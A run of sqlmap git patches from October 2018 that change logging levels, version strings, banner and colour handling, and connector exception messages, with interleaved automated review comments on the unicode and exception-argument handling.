@@ -7,7 +7,6 @@ from lib.core.common import filterPairValues from lib.core.common import isTechniqueAvailable -from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming from lib.core.common import unArrayizeValue diff --git a/plugins/generic/users.py b/plugins/generic/users.py index 9ff861908bb..e2cec9763ca 100644 --- a/plugins/generic/users.py +++ b/plugins/generic/users.py @@ -19,7 +19,6 @@ from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable from lib.core.common import parsePasswordHash -from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import unArrayizeValue from lib.core.convert import hexencode diff --git a/sqlmap.py b/sqlmap.py index 31410a11fd8..6488066b4eb 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -69,11 +69,11 @@ errMsg = "user aborted" if "logger" in globals(): - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit else: import time - exit("\r[%s] [ERROR] %s" % (time.strftime("%X"), errMsg)) + exit("\r[%s] [CRITICAL] %s" % (time.strftime("%X"), errMsg)) def modulePath(): """ @@ -196,7 +196,7 @@ def main(): errMsg = "user aborted" try: - logger.error(errMsg) + logger.critical(errMsg) except KeyboardInterrupt: pass diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 5164c2219e1..a52e4944714 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 8eb0a5dbd79bd58fedac4c0cc344246b lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -cbf9428039f52d8ee80fcf79b6583b7c lib/core/common.py +2f47247892e5d558bbbe97c6cec7121f lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
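Review bot: In the first sqlmap.py hunk the fallback `exit("\r[%s] [CRITICAL] %s" % (time.strftime("%X"), errMsg))` hard-codes the level label separately from the `logger.critical(errMsg)` path, which is why this commit had to edit both strings and why they can drift apart again. Binding the label once for both branches, e.g. `level = "CRITICAL"` above the `if "logger" in globals():` test and formatting with `"[%s]" % level`, or deriving it from `logging.getLevelName(logging.CRITICAL)` if `logging` is importable at that point, keeps the two outputs consistent. The enclosing try/except block starts outside the hunk.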
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -5192b4916a979e3fb249b72e3a89b3a6 lib/core/settings.py +16e697be36101880289e6095a0978a4b lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -156,7 +156,7 @@ aa77fec4fe6b2d7ca4a91aebd9ff4e21 plugins/dbms/informix/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py 1e5532ede194ac9c083891c2f02bca93 plugins/dbms/__init__.py 6917f9b045f6188b89e816dea9b46a3f plugins/dbms/maxdb/connector.py -53d1bf931baa6b76198ece861e2318a3 plugins/dbms/maxdb/enumeration.py +1f3f9d4c7ec62452ed2465cd9cf50aa1 plugins/dbms/maxdb/enumeration.py ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py 9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py 4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py @@ -171,7 +171,7 @@ f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py 11a5724fdc0b0c0eb2626d952cda216a plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py -34216d44fe66ffc8c5b4a0714839cf9f plugins/dbms/mysql/filesystem.py +edec54520556a5eb66900fca697940ff plugins/dbms/mysql/filesystem.py 1c0175476b833a1b788550726be67c99 plugins/dbms/mysql/fingerprint.py 30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py 
@@ -198,7 +198,7 @@ f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py 964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py 3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py 9e64e67291a4c369bad8b8cf2cfa722a plugins/dbms/sybase/connector.py -b856f677371a59d4a01b72bacac88032 plugins/dbms/sybase/enumeration.py +4fe9ee0dfa50e9c46e6512128471cbee plugins/dbms/sybase/enumeration.py 74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py 0329ab09187614bea02398def59695ec plugins/dbms/sybase/fingerprint.py a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py @@ -216,7 +216,7 @@ f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py b1d2a7f3170f9b69e71335aa47f9b08b plugins/generic/search.py a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py a37c21cc3fa5c0c220d33d450bf503ed plugins/generic/takeover.py -4db140069923afbae38fd93e37c00248 plugins/generic/users.py +e762c77ff79e4c138145501f6fbb10cb plugins/generic/users.py 1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py 5dc693e22f5d020c5c568d7325bd4226 shell/backdoors/backdoor.asp_ 158bfa168128393dde8d6ed11fe9a1b8 shell/backdoors/backdoor.aspx_ @@ -227,7 +227,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -5f30815ebe320e46e5898dc819e629a7 sqlmap.py +c66cb57ef2d927d5e22a84413121b9ef sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py From 36b660309b65b67909e766d797df184134147c53 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Wed, 3 Oct 2018 12:28:55 +0200 Subject: [PATCH 313/428] Minor patch --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- sqlmap.py | 1 + thirdparty/termcolor/termcolor.py | 2 ++ txt/checksum.md5 | 8 ++++---- 5 files changed, 9 insertions(+), 6 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 75d2eca2fed..6bf632b6b43 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1198,7 +1198,7 @@ def banner(): This function prints sqlmap banner with its version """ - if not any(_ in sys.argv for _ in ("--version", "--api")): + if not any(_ in sys.argv for _ in ("--version", "--api")) and not conf.get("disableBanner"): _ = BANNER if not getattr(LOGGER_HANDLER, "is_tty", False) or "--disable-coloring" in sys.argv: diff --git a/lib/core/settings.py b/lib/core/settings.py index e352d40f3ef..ee3be4af375 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.7" +VERSION = "1.2.10.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index 6488066b4eb..7085f59edd8 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -388,6 +388,7 @@ def main(): cmdLineOptions.clear() conf.clear() kb.clear() + conf.disableBanner = True main() if conf.get("api"): diff --git a/thirdparty/termcolor/termcolor.py b/thirdparty/termcolor/termcolor.py index f11b824b287..bac57f28a97 100644 --- a/thirdparty/termcolor/termcolor.py +++ b/thirdparty/termcolor/termcolor.py @@ -79,6 +79,8 @@ )) ) +COLORS.update(dict(("light%s" % color, COLORS[color] + 60) for color in COLORS)) + RESET = '\033[0m' diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a52e4944714..ee8356ce4b6 100644 
--- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 8eb0a5dbd79bd58fedac4c0cc344246b lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -2f47247892e5d558bbbe97c6cec7121f lib/core/common.py +6d8bda015437de6439ad93a83fa92410 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -16e697be36101880289e6095a0978a4b lib/core/settings.py +68c0986d21fbc5f154c02869e371cb7e lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -227,7 +227,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -c66cb57ef2d927d5e22a84413121b9ef sqlmap.py +c6f90d321b9ec7bff5b3be15cd4e19d8 sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py 
@@ -359,7 +359,7 @@ a7f735641c5b695f3d6220fe7c91b030 thirdparty/pydes/pyDes.py d41d8cd98f00b204e9800998ecf8427e thirdparty/socks/__init__.py afd97f26bffa0532ee4eb4f5f8ec1ab7 thirdparty/socks/socks.py d41d8cd98f00b204e9800998ecf8427e thirdparty/termcolor/__init__.py -ea649aae139d8551af513769dd913dbf thirdparty/termcolor/termcolor.py +d97198005a387a9d23916c616620ef7f thirdparty/termcolor/termcolor.py bf55909ad163b58236e44b86e8441b26 thirdparty/wininetpton/__init__.py a44e7cf30f2189b2fbdb635b310cdc0c thirdparty/wininetpton/win_inet_pton.py 855372c870a23d46683f8aa39d75f6a1 thirdparty/xdot/__init__.py From eba01ee74ec60e84ae75417abe962db9adeba771 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 3 Oct 2018 12:46:40 +0200 Subject: [PATCH 314/428] Just in case patch (for --api) --- lib/core/common.py | 4 ++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 6bf632b6b43..c4c676b60a2 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -899,7 +899,7 @@ def clearColors(message): retVal = message - if message: + if isinstance(message, str): retVal = re.sub(r"\x1b\[[\d;]+m", "", message) return retVal @@ -923,7 +923,7 @@ def dataToStdout(data, forceOutput=False, bold=False, content_type=None, status= try: if conf.get("api"): - sys.stdout.write(message, status, content_type) + sys.stdout.write(clearColors(message), status, content_type) else: sys.stdout.write(setColor(message, bold=bold)) diff --git a/lib/core/settings.py b/lib/core/settings.py index ee3be4af375..6958c78299a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
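Review bot: In the clearColors hunk the new guard `if isinstance(message, str):` excludes `unicode` objects, and this codebase is Python 2 (the series uses `except X, msg:` and `basestring` elsewhere), so a unicode message now reaches the new `sys.stdout.write(clearColors(message), status, content_type)` in dataToStdout with its ANSI escapes intact, whereas the previous `if message:` stripped them for both string types. Using `if isinstance(message, basestring):` keeps the non-string protection this commit adds without regressing unicode input. clearColors is shown in full here; dataToStdout starts and ends outside its hunk.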
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.8" +VERSION = "1.2.10.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index ee8356ce4b6..1667246c9de 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 8eb0a5dbd79bd58fedac4c0cc344246b lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -6d8bda015437de6439ad93a83fa92410 lib/core/common.py +c2b12f7e29e9b2d9290c2a8a0a317499 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -68c0986d21fbc5f154c02869e371cb7e lib/core/settings.py +88fff14c74e98f54caafe8ef5f865ee6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From 3984b9429726f8c6e1b5a6968f3679c2ccdbacfb Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Thu, 4 Oct 2018 13:42:13 +0200 Subject: [PATCH 315/428] Fixes #3271 --- lib/core/common.py | 2 ++ lib/core/settings.py | 2 +- plugins/dbms/access/connector.py | 9 +++++---- plugins/dbms/db2/connector.py | 7 ++++--- plugins/dbms/firebird/connector.py | 9 +++++---- plugins/dbms/informix/connector.py | 9 +++++---- plugins/dbms/mysql/connector.py | 13 ++++++------- txt/checksum.md5 | 14 +++++++------- 8 files changed, 35 insertions(+), 30 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index c4c676b60a2..17574782212 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -4727,6 +4727,8 @@ def getSafeExString(ex, encoding=None): retVal = ex.message elif getattr(ex, "msg", None): retVal = ex.msg + elif isinstance(ex, (list, tuple)) and len(ex) > 1 and isinstance(ex[1], basestring): + retVal = ex[1] return getUnicode(retVal or "", encoding=encoding).strip() diff --git a/lib/core/settings.py b/lib/core/settings.py index 6958c78299a..d4c4f3d9f0a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.9" +VERSION = "1.2.10.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/access/connector.py b/plugins/dbms/access/connector.py index 4e579c97f1c..13dc3c12471 100644 --- a/plugins/dbms/access/connector.py +++ b/plugins/dbms/access/connector.py @@ -12,6 +12,7 @@ import logging +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException 
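Review bot: The new branch in the getSafeExString hunk, `elif isinstance(ex, (list, tuple)) and len(ex) > 1 and isinstance(ex[1], basestring):`, only fires when `ex` is itself a list or tuple, yet the connector hunks in this commit (plugins/dbms/access, db2, firebird, informix and mysql) now pass DB-API exception instances through it in place of the former `msg[1]`; for those the text lives in `ex.args[1]`, and on Python 2 `ex.message` is empty when an exception carries two args, so unless a branch above the hunk reads `ex.args`, the raised SqlmapConnectionException and the "(remote)" log lines lose the driver's error text. Adding `elif len(getattr(ex, "args", ())) > 1 and isinstance(ex.args[1], basestring): retVal = ex.args[1]` next to the new branch covers both shapes. The top of getSafeExString, including how retVal is initialised, is outside the hunk.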
@@ -43,7 +44,7 @@ def connect(self): try: self.connector = pyodbc.connect('Driver={Microsoft Access Driver (*.mdb)};Dbq=%s;Uid=Admin;Pwd=;' % self.db) except (pyodbc.Error, pyodbc.OperationalError), msg: - raise SqlmapConnectionException(msg[1]) + raise SqlmapConnectionException(getSafeExString(msg)) self.initCursor() self.printConnected() @@ -52,16 +53,16 @@ def fetchall(self): try: return self.cursor.fetchall() except pyodbc.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) return None def execute(self, query): try: self.cursor.execute(query) except (pyodbc.OperationalError, pyodbc.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) except pyodbc.Error, msg: - raise SqlmapConnectionException(msg[1]) + raise SqlmapConnectionException(getSafeExString(msg)) self.connector.commit() diff --git a/plugins/dbms/db2/connector.py b/plugins/dbms/db2/connector.py index dcb2b5fca5b..73f7ebba47b 100644 --- a/plugins/dbms/db2/connector.py +++ b/plugins/dbms/db2/connector.py @@ -12,6 +12,7 @@ import logging +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException 
@@ -44,16 +45,16 @@ def fetchall(self): try: return self.cursor.fetchall() except ibm_db_dbi.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) return None def execute(self, query): try: self.cursor.execute(query) except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) except ibm_db_dbi.InternalError, msg: - raise SqlmapConnectionException(msg[1]) + raise SqlmapConnectionException(getSafeExString(msg)) self.connector.commit() diff --git a/plugins/dbms/firebird/connector.py b/plugins/dbms/firebird/connector.py index f6b88cb0048..42e2ea925f1 100644 --- a/plugins/dbms/firebird/connector.py +++ b/plugins/dbms/firebird/connector.py @@ -12,6 +12,7 @@ import logging +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -42,7 +43,7 @@ def connect(self): # Reference: http://www.daniweb.com/forums/thread248499.html self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8") except kinterbasdb.OperationalError, msg: - raise SqlmapConnectionException(msg[1]) + raise SqlmapConnectionException(getSafeExString(msg)) self.initCursor() self.printConnected() 
@@ -51,16 +52,16 @@ def fetchall(self): try: return self.cursor.fetchall() except kinterbasdb.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) return None def execute(self, query): try: self.cursor.execute(query) except kinterbasdb.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) except kinterbasdb.Error, msg: - raise SqlmapConnectionException(msg[1]) + raise SqlmapConnectionException(getSafeExString(msg)) self.connector.commit() diff --git a/plugins/dbms/informix/connector.py b/plugins/dbms/informix/connector.py index e85de013fc5..f97ec1a7390 100644 --- a/plugins/dbms/informix/connector.py +++ b/plugins/dbms/informix/connector.py @@ -12,6 +12,7 @@ import logging +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -35,7 +36,7 @@ def connect(self): database = "DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;" % (self.db, self.hostname, self.port) self.connector = ibm_db_dbi.connect(database, self.user, self.password) except ibm_db_dbi.OperationalError, msg: - raise SqlmapConnectionException(msg) + raise SqlmapConnectionException(getSafeExString(msg)) self.initCursor() self.printConnected() 
@@ -44,16 +45,16 @@ def fetchall(self): try: return self.cursor.fetchall() except ibm_db_dbi.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) return None def execute(self, query): try: self.cursor.execute(query) except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) except ibm_db_dbi.InternalError, msg: - raise SqlmapConnectionException(msg[1]) + raise SqlmapConnectionException(getSafeExString(msg)) self.connector.commit() diff --git a/plugins/dbms/mysql/connector.py b/plugins/dbms/mysql/connector.py index 7521b2bc2b7..184e2eaff18 100644 --- a/plugins/dbms/mysql/connector.py +++ b/plugins/dbms/mysql/connector.py @@ -13,6 +13,7 @@ import logging import struct +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -37,10 +38,8 @@ def connect(self): try: self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True) - except (pymysql.OperationalError, pymysql.InternalError, pymysql.ProgrammingError), msg: - raise SqlmapConnectionException(msg[1]) - except struct.error, msg: - raise SqlmapConnectionException(msg) + except (pymysql.OperationalError, pymysql.InternalError, pymysql.ProgrammingError, struct.error), msg: + raise SqlmapConnectionException(getSafeExString(msg)) self.initCursor() self.printConnected() 
@@ -49,7 +48,7 @@ def fetchall(self): try: return self.cursor.fetchall() except pymysql.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) return None def execute(self, query): @@ -59,9 +58,9 @@ def execute(self, query): self.cursor.execute(query) retVal = True except (pymysql.OperationalError, pymysql.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) except pymysql.InternalError, msg: - raise SqlmapConnectionException(msg[1]) + raise SqlmapConnectionException(getSafeExString(msg)) self.connector.commit() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1667246c9de..777e9baeded 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 8eb0a5dbd79bd58fedac4c0cc344246b lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -c2b12f7e29e9b2d9290c2a8a0a317499 lib/core/common.py +11448f59efbfdceff2437239e36d9dc5 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -88fff14c74e98f54caafe8ef5f865ee6 lib/core/settings.py +d6947d662df4d4bc9c33012a98a5fbc8 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py 
@@ -119,21 +119,21 @@ d0f4d56c5d6a09a4635035e233d4a782 lib/utils/hash.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py 4703ceeb32131a9a7a6561575644123b lib/utils/versioncheck.py e9e73cd6bd814dd7823a9da913cea61c lib/utils/xrange.py -b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py +d8a541a63f3b561334de51abb4dcad55 plugins/dbms/access/connector.py 3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py fcc66fc377db3681f7890ec55675564b plugins/dbms/access/filesystem.py cdd082981b421248ece0e7cf278071ff plugins/dbms/access/fingerprint.py e657b1b7a295a38ac9ce515158164f00 plugins/dbms/access/__init__.py 77686d7c7e287d5db0a9a87f2c7d4902 plugins/dbms/access/syntax.py 2f1d8706b51497623b2b59c07b552bdc plugins/dbms/access/takeover.py -8df07c2805aceb7d6fb4add40de84795 plugins/dbms/db2/connector.py +24a79eb2dde8ea9340a701c8c2591701 plugins/dbms/db2/connector.py 4deeda463003ab71e7d2f34a263b5bbf plugins/dbms/db2/enumeration.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/db2/filesystem.py ce434fc05a7ad236c49a155d62f0cac4 plugins/dbms/db2/fingerprint.py 95b35cbd859bbced44e7f8fd84486d75 plugins/dbms/db2/__init__.py 82d96d8fcfd565129580260040555623 plugins/dbms/db2/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/db2/takeover.py -53bd7de27d37958f543f5329362ac298 plugins/dbms/firebird/connector.py +1ac54bbfb81ffed945636432bc49466b plugins/dbms/firebird/connector.py bc4d71116d7296d63894484f2e60ade2 plugins/dbms/firebird/enumeration.py c3ca81000200e5ab4210e9bf2e04ce93 plugins/dbms/firebird/filesystem.py bf98dbd666c162088f23ee697c065010 plugins/dbms/firebird/fingerprint.py 
@@ -147,7 +147,7 @@ aabc2b877a3696b99912bdf362c0fb69 plugins/dbms/hsqldb/fingerprint.py fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py 7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py -97dac442190bd4ffac3ba292e2abfd4c plugins/dbms/informix/connector.py +d61a5f79a9fa07c06fe7f5a653662e95 plugins/dbms/informix/connector.py c54d70e4847c6327bd3110c4d8723b04 plugins/dbms/informix/enumeration.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/informix/filesystem.py b182f01c2ba82aa94fbe4948383ea98d plugins/dbms/informix/fingerprint.py @@ -169,7 +169,7 @@ f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py 3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py -11a5724fdc0b0c0eb2626d952cda216a plugins/dbms/mysql/connector.py +14bfa3960ed0b4bec2cd29800ec525b7 plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py edec54520556a5eb66900fca697940ff plugins/dbms/mysql/filesystem.py 1c0175476b833a1b788550726be67c99 plugins/dbms/mysql/fingerprint.py From d1022f3f59fc82bee58ea46b2673a9b86f1eb5bf Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 4 Oct 2018 13:51:41 +0200 Subject: [PATCH 316/428] Fixes #3246 --- lib/core/agent.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index 1a6f9819972..8971ab0f4b3 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py 
